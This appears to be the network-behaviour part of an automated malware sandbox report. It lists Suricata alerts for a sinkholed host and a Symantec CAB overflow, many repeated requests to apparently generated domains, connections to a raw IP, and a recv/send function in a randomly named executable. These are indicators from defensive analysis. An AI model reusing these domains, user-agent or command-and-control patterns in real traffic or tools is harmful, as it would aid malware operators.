Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.10:57974
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.10:57974
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.10:49807
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.10:64065
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345917.6190825
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0425-1706-a2c8-02526792f211 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345917.8924867
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F9970 GetProcessHeap,HeapFree,recv,recv,send,recv,22_2_012F9970
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
